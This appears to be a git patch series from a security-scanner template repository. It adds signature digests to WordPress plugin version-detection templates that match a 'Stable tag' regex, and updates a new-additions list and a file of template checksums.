a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eeffc8a5e872f4c2741ee735cd616098da2fd26fa5fe1bc8dbfd72c9e2660e1f022100cce47abeea9ca9c6b9a30166230a52d12ab725a9f57d65821235ead0bedeb5f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..13d7878d7d 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe68fe3b7b4de6e82974e305b025757c7354f5726bba3c6a64aa9a12837d3ffb02207399b0e15a1a32d3f18057f2022efd0b2ef2f7988dd440c7f93d9d0d1c429205:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..bed58adb32 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f73848862fb54cf09ee07a562ac78e98c08abed02f010b0c7ed9b06a651e918d022100aa92ac5230d924290b46e234070dc9341e5b1228e58b32724c461b911afb6190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..d0036d7d28 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220551cf6c0ccfbfa5019eae56d68c8036b80b7810b69f51780f5c32b29f49f2bf50221009cf4013998ed5f22229bb0f7120dda5e6c25f50415b022932324d01776eee998:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..59f2fa9293 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002b718e62bfd7fedd6e73a0db2f507a66c012dcf489de800bb8ec7684c682c9302210083a5912b0fe7a0e5ad76e4b433e17e143ab9bbd94b77b283da774b5a946daada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..41c46271ae 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220349dd808c6d94c48bd924a9b535da36634c8dcdad903f31294aabc987449001d02207ecaba494c9956e678eddd38e356e3a5042469ed61c9b482a5be954d81e7ecea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..8b94ec9705 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb11e4819198956f27f8ab1bd725f27dcb237fa01a395bdac5a8f62fb9d9faa9022100c83012d6095c12be995dd31c89b58f0be21a94d23a897a18a5ac333389a34a6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..3199f4f0f4 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210083a913042a45112d1b91c08b8fc558d4179d5b8eb1cb50cf852649295cf462cc022058c39db1b55c39b643ca523dab4756708dccfae5146e51e0e3d8fd7846b37802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..9477f590af 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f5dd9cab4e9465d25b5b25ac4f6df79e500f56b521149f86a26290f2a5883d3302202b993548be934162ef41b9dab07053e7e6b9843486aae5c9f7fe99a931d07096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..d50421162f 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050663b4ebaf63da03fc096ac7b8b70ad025a0e085c9f72a7bd1c15ac3f3fc82a0220056f39fd178306ee7dd3a66498b5bd0a1d8f1529b0b3604a92cbe9c9de2f5d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a73968fc24269358bc2edc10579238d67ab17458 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:04:29 +0000 Subject: [PATCH 1525/1841] Auto Generated New Template Addition List [Tue Jul 23 07:04:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 04dd86df06..5ff47fcf6e 100644 --- a/.new-additions +++ b/.new-additions @@ -35,6 +35,7 @@ http/misconfiguration/freshrss-unauth.yaml http/misconfiguration/installer/adguard-installer.yaml http/misconfiguration/installer/freshrss-installer.yaml http/misconfiguration/servicenow-title-injection.yaml +http/misconfiguration/sftpgo-admin-setup.yaml http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/fluent-smtp.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml From 96ba2ba070493131bbc7e09b979a5d49187d6825 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 07:04:34 +0000 Subject: [PATCH 1526/1841] Auto Generated Templates Checksum [Tue Jul 23 07:04:34 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 462076e609..a7171bca66 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2871,7 +2871,7 @@ http/cves/2022/CVE-2022-3800.yaml:a700c9264ffbedb46a2f3a22ec7e98be500097c5 http/cves/2022/CVE-2022-38131.yaml:49cadbb0bb2d72895fe3281f98c67e1332d50025 http/cves/2022/CVE-2022-38295.yaml:e935234c93f236f44ebedc6ec81801116b26d54b http/cves/2022/CVE-2022-38296.yaml:236c15b302eedb112d21bc64a388b0d716416755 -http/cves/2022/CVE-2022-38322.yaml:640c129a9962ce478a6a496944284346866c68f5 +http/cves/2022/CVE-2022-38322.yaml:a6dc529af3f38c615a3523546602018f81a14ed8 http/cves/2022/CVE-2022-38463.yaml:70a4b47b359c9e8ee1b0ce6199a3b6025de0d330 http/cves/2022/CVE-2022-38467.yaml:4169be779f0b8254f3f7ce902339096ba486b03c http/cves/2022/CVE-2022-38553.yaml:6bb6d72813bfba832f77273ab2d04a4c7ce2d5bf @@ -5947,6 +5947,7 @@ http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe20 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 http/misconfiguration/servicenow-title-injection.yaml:6e2f091a40860419e5be19393caf23c1ef608ffa http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b +http/misconfiguration/sftpgo-admin-setup.yaml:c5ee25008c1a96d8bad2a677603f33473545eca1 http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0 http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d http/misconfiguration/sitecore-lfi.yaml:1a0abe7d31d65b931c8e017a94fecc7e3086333c @@ -7311,230 +7312,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:471e2f5b65827cd0534f4e42ee839a5529429cb4 +http/technologies/wordpress/plugins/add-to-any.yaml:ee21ec988aca4a426d38b4670cc157bee5396c48 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:283ebaaf95b4c1ed6c6bf9559115f863ee2f2700 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:6e16ad203580da6ce3fa3d232d3149529f4e6117 +http/technologies/wordpress/plugins/akismet.yaml:b0d2cab5f44c4b6516c0ff972ad2b94ec5ecd68c http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c06da7b337ab8d0b96c37719c6ca2fb2674b4b6c +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:93b1e4088b1fbd2a706faa2dfe4adb11a768748f +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:297c443c69434128832bab1f192981716d0709f7 +http/technologies/wordpress/plugins/amp.yaml:86b1b4141fec07714ba2f3bdd43e7e6a823795f0 +http/technologies/wordpress/plugins/antispam-bee.yaml:94609a86e5382690014ad032cc9b9ada301a4535 +http/technologies/wordpress/plugins/astra-sites.yaml:87a0e262a216d7c80d9f66ab8cac38303fcff66f http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:ca6164fc2f77a2f245d569d3e7f7a4957ff601be +http/technologies/wordpress/plugins/backwpup.yaml:1ad7199d5d8aa303a032eab557a9c51ad56edf0b +http/technologies/wordpress/plugins/better-search-replace.yaml:2e6777dd855e66114818bee7bbbf57d00f52ef52 +http/technologies/wordpress/plugins/better-wp-security.yaml:ae74a705ab72e3eef0f57ebf493fc00c02048c12 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:61ec9833a36bb80896d9631916c67ec7d19ea55f +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:05b81447620750872fb10b224cfc846bf53b8563 +http/technologies/wordpress/plugins/breeze.yaml:76928160c448edf67323c7cc1926775c8368e310 +http/technologies/wordpress/plugins/broken-link-checker.yaml:97b5b1ccd2087e67c3e0916dc03665b427298778 +http/technologies/wordpress/plugins/chaty.yaml:e5aa343b5f93ba7897885505f848415d4f0ef0ba +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5786d982f7f890ba426f015644c495089978ab18 +http/technologies/wordpress/plugins/classic-editor.yaml:4fbb338d7104e5daba4d7559b431ef5f9651df0b +http/technologies/wordpress/plugins/classic-widgets.yaml:e5f7f7cf2a54133bf97ac29cdbde54c60788c31f +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:fb2429d1886b9e01595b8aeeac5157ee44cf0fc5 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:1cb248b8c080ad7976dc04a2d080711342a47c99 +http/technologies/wordpress/plugins/coblocks.yaml:95f0b7388558c5379093c1fecbe4af87ef1f332f +http/technologies/wordpress/plugins/code-snippets.yaml:ad4348ce5c23b5afd07b9ea8470aaeb9a6440fae +http/technologies/wordpress/plugins/coming-soon.yaml:a0a6628a74c028fcfdc24a7ed71768e35b391d2e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:ce2b7073b7f1ac8881d1a12281ab93b65a119713 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:c74f7cb2d5328d8575371cc7a639887405998170 +http/technologies/wordpress/plugins/contact-form-7.yaml:fb21904525cc325db2169fdf3e468fea7d49fa8f +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:f942b181d8a18ec9132301b6e64526eea823fef4 +http/technologies/wordpress/plugins/cookie-law-info.yaml:c6d9912c32655f63408125a936361f038fcde030 +http/technologies/wordpress/plugins/cookie-notice.yaml:0c55b84bfd433d4f1f1b54d1a065b7292f51c8de +http/technologies/wordpress/plugins/copy-delete-posts.yaml:e1cf3ce8f28d872ee43fc7b0ec8774ecea81e2ff +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:e10f29d3b77915d0a70a36ada289aa8f4ca5c432 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c2d2858f6dd74b5b2d95868e8d8e10b5a79c14d8 +http/technologies/wordpress/plugins/custom-css-js.yaml:1c7e125af54203e3c583f24b4e11c96f9928b53c +http/technologies/wordpress/plugins/custom-fonts.yaml:1518082274355f215299e3d7d2b7289ff1c0d8de +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:c3389f02e457e388d18d96c0454a84d4a71d47cf +http/technologies/wordpress/plugins/disable-comments.yaml:57d3bb339a8d5b7a5c4379737301eddfd8f434a8 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:26c339b6fcf609e68332f5ea078744d6d0927347 +http/technologies/wordpress/plugins/duplicate-page.yaml:7e6643590eeaf2289f36bed264c65cf7fbfb0425 +http/technologies/wordpress/plugins/duplicate-post.yaml:1eda904fd3661b388cf8c53da97ebf39dae2fb34 +http/technologies/wordpress/plugins/duplicator.yaml:ce1e8ee1e296c6061508b1bf0b6483d4b5f5baf6 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:4ae8746463ea24cee8350e59d73bf932aa75f8f5 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:4b912fbfdb21a9036b88d3826d9bd04ab0cc69f8 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:b3abc6765d3266b7b6ec064a8dca8acc70ffa7dd +http/technologies/wordpress/plugins/elementor.yaml:636815a0c1eb971dfdd1189ca46417dac622ba80 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e2f477693864f019a8ae82940c404bc013fca04a +http/technologies/wordpress/plugins/enable-media-replace.yaml:5912dc7f30e94e8d0ad876a267501b65c0adb97e +http/technologies/wordpress/plugins/envato-elements.yaml:fa8d1858e1af093e77151cf884391857ef3f4a13 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:2dabe450bf64107bb27fdadd4e28808afc8eaae0 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:3f34665056fef3cb0da96f059f6c4bcb1a2dd517 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:7d5f8602b1d83bc7c020d8b25d41c0f8883b2e79 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:42bf3f97c31c48fb0e9fb10c2b3f127a4e09a5f7 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:a3a0dd7fd567764cb7fa924100c76e680ee20276 +http/technologies/wordpress/plugins/flamingo.yaml:851efe3e25cc5717d3348cc3f8a1f8cd658734bb +http/technologies/wordpress/plugins/fluent-smtp.yaml:b951fb56027053b0ca1936cdadcf6e6b8ee632a8 +http/technologies/wordpress/plugins/fluentform.yaml:653237cae559d654921b429ebcaa8a45ac7f2894 +http/technologies/wordpress/plugins/font-awesome.yaml:b2582e5968d65373cdf2c8664fc4aec01120c70e +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:02e6b8135b515f6f1b089f896b9bf8f8afa5d889 +http/technologies/wordpress/plugins/formidable.yaml:87d9465edd371b6f2f5eadc912e13efed7311d7a +http/technologies/wordpress/plugins/forminator.yaml:fb45f7c3d9bb7bb8d504bf793aa91f61ddcb72cf +http/technologies/wordpress/plugins/ga-google-analytics.yaml:42ba92e278e7e52102e7a6a366ad30dd8eebe6e5 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:2618e309b9b61611b838ebcf6cc9d00e60e93a67 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:782571dd07b76c404f8f7f7562259521277441f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:eb8df8856259573a11ec8ad31325b46734a44998 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:999c4af5f995f72e39fa64bc49cf5afe4723a2dc +http/technologies/wordpress/plugins/google-site-kit.yaml:0d70dd126e1cec7a85d9eb423531d74443710b85 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:43aada0ae4222137c38a414f73fa37c7c225f890 +http/technologies/wordpress/plugins/gtranslate.yaml:14c6ebaf6245811d5a612eb3f22c1ec89e0ca56a +http/technologies/wordpress/plugins/gutenberg.yaml:cf698abdcc238123420ccb78438ee8931d5ad120 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:48df01ad9f1eb8ca12f5288766b2a817f13479dc http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:f8d07a36499862bbef67903105e1be02b072d37a +http/technologies/wordpress/plugins/header-footer-elementor.yaml:abc775b01ad66cfe92769231892b32c6fc4ed661 +http/technologies/wordpress/plugins/header-footer.yaml:dc1aaed33744b8388fdc664bacf0bf891ca60055 +http/technologies/wordpress/plugins/health-check.yaml:2f432908267370cf97d7c632fa6ce89cc10a4f66 +http/technologies/wordpress/plugins/hello-dolly.yaml:381cd1a04c2986c7d647c50ff522dc30fca007a7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:5f75cc78032394b7161466ef23e81a388caa650d +http/technologies/wordpress/plugins/hostinger.yaml:35332836dfb92727887f3770e5237f5f3fddcd66 +http/technologies/wordpress/plugins/image-optimization.yaml:ced096cbce8d863a7cf147642b0510d9e0ea5052 +http/technologies/wordpress/plugins/imagify.yaml:a3bde87ef2d269952c27eba078611a15450fe044 +http/technologies/wordpress/plugins/imsanity.yaml:1195d3a79b8e9b6a2de32a30afad88f72a9132fe +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:6cb9537a88653f6f8c437b5ea5c65c8fe7049809 +http/technologies/wordpress/plugins/instagram-feed.yaml:bb5821d64e61b7d965223527d9e167c2600c8227 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:0bf67b3d5cc7ca4318df6fb50d29de3d18ae33f5 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 